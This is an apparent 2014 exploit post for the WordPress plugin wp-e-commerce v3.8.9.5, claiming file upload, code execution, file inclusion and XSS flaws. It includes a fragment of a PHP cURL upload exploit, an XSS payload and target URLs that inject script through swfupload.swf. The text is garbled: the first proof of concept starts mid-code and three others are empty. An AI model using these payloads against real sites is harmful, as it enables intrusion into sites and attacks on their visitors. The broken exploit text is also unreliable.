########################################### #-----------------------------------------# #[ 0-DAY Aint DIE | No Priv8 | KedAns-Dz ]# #-----------------------------------------# # *----------------------------* # # K |....##...##..####...####....| . # # h |....#...#........#..#...#...| A # # a |....#..#.........#..#....#..| N # # l |....###........##...#.....#.| S # # E |....#.#..........#..#....#..| e # # D |....#..#.........#..#...#...| u # # . |....##..##...####...####....| r # # *----------------------------* # #-----------------------------------------# #[ Copyright © 2014 | Dz Offenders Cr3w ]# #-----------------------------------------# ########################################### # >> D_x . Made In Algeria . x_Z << # ###################################################################### # # [>] Title : Wordpress Plugin (wp-e-commerce v3.8.9.5) Multiple Vulnerabilities # # [>] Author : KedAns-Dz # [+] E-mail : ked-h (@hotmail.com) # [+] FaCeb0ok : fb.me/K3d.Dz # [+] TwiTter : @kedans # # [#] Platform : PHP / WebApp # [+] Cat/Tag : File Upload , Code Exec , File Include , Cross-Site Scripting , Object Inject # # [<] <3 <3 Greetings t0 Palestine <3 <3 # [>] ^_^ Greetings to 1337day Users/FAN's and Owners <3 *_* , i'm leaving 1337day # [-] F-ck Hacking , LuV Exploiting .. Penetration-Testing rouls # ###################################################################### ##====[ PoC(1) : File Upload ]================================ # # - CWE : CWE-616 , CWE-434 # # "@$uploadfile")); # curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); # curl_setopt($ch, CURLOPT_HTTPHEADER, $headers); # $postResult = curl_exec($ch); # curl_close($ch); # print "$postResult"; # ?> # ##====[ PoC(2) : Remote Code ExeC ]=========================== # # - CWE : CWE-94 # # # ##====[ PoC(3) : Remote Code ExeC ]=========================== # # - CWE : CWE-94 # # # ##=====[ PoC(4) Local File Include ]========================== # # - CWE : CWE-98 # # # ##====[ PoC(5) Remote XSS/XSRF ]============================== # # - http://1337day.com/exploit/20517 # - CVE :CVE-2012-2399 , CVE-2012-3414 # - CWE : CWE-352 # # JS alert() Code : %22]%29;}catch%28e%29{}if%28!self.a%29self.a=!alert%28%27HaCked%20By%20KedAns-Dz%27%29;// # # http://[Target]/[path]/wp-e-commerce/wpsc-core/js/swfupload/swfupload.swf?movieName=[ JS Code ] # http://[Target]/[path]/wp-e-commerce/wpsc-core/js/swfupload/swfupload.swf?buttonImageURL=[ Object/Image URL ] # ############################################################### #### # # Hassi Messaoud (30500) , 1850 city/hood si' elHaouass .<3 #--------------------------------------------------------------- # Greetings to my Homies : Indoushka , Caddy-Dz , Kalashinkov3 , # Chevr0sky , Mennouchi.Islem , KinG Of PiraTeS , TrOoN , T0xic, # & Jago-dz , Over-X , Kha&miX , Ev!LsCr!pT_Dz , Barbaros-DZ , & # & KnocKout , Angel Injection , The Black Divels , kaMtiEz , & # & Evil-Dz , Elite_Trojan , MalikPc , Marvel-Dz , Shinobi-Dz, & # & Keystr0ke , JF , r0073r , CroSs , Inj3ct0r/Milw0rm 1337day & # =( packetstormsecurity.org * metasploit.com * OWASP & OSVDB )= ####